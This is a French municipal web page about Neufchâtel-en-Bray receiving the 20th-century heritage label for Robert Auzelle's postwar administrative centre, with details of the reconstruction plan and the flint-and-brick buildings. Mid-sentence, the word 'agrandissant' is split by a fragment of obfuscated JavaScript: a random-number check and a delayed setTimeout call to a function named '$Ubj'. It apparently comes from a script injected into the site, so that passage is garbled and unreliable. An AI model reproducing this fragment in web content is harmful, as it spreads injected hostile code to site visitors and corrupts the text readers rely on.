Label XXème siècle

Accueil > Monuments historiques > Label XXème siècle

Le 31 Mars 2015, Neufchâtel-en-Bray a reçu le label Patrimoine du XXème siècle pour la réalisation de son Centre administratif par Robert Auzelle, distinction attribuée par le Ministère de la Culture et de la Communication.

Détruite à 80% en juin 1940, Neufchâtel-en-Bray est, après-guerre, une ville à reconstruire. C’est l’architecte urbaniste Robert Auzelle (1913-1983) qui est désigné en 1941 par le Ministère de la Reconstruction pour réaliser le plan du futur Neufchâtel qui fut présenté à la population sous forme d’une exposition publique en 1942. Ce plan prévoyait le détournement de la Béthune et la création d’un pont-route pour enjamber l’ancienne voie ferrée, le regroupement des édifices publics au cœur de la ville pour faciliter les déplacements, l’amélioration de la circulation en agrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}andissant l’axe principal du centre-ville sans toucher au tracé initial des routes, afin de préserver les activités commerciales.

1952-1961 : Construction du Centre administratif

En 1952, Robert Auzelle se verra confier la création du Centre administratif regroupant quatre édifices dans un lieu unique, centre qu’il avait établi dans son plan de reconstruction sur une partie de l’ancienne motte féodale : le théâtre, la salle des fêtes, le Palais de Justice, puis l’Hôtel de Ville.

Devant assurer cette construction avec la modicité des crédits provenant uniquement des dommages de guerre, Robert Auzelle choisit comme matériaux le silex et la brique, matériaux économiques et traditionnels du Pays de Bray.

La disposition et l’architecture des quatre bâtiments de forme différente ont été conçues pour mettre en valeur les espaces verts, privilégier la circulation piétonne, et offrir ainsi une multitude de points de vue.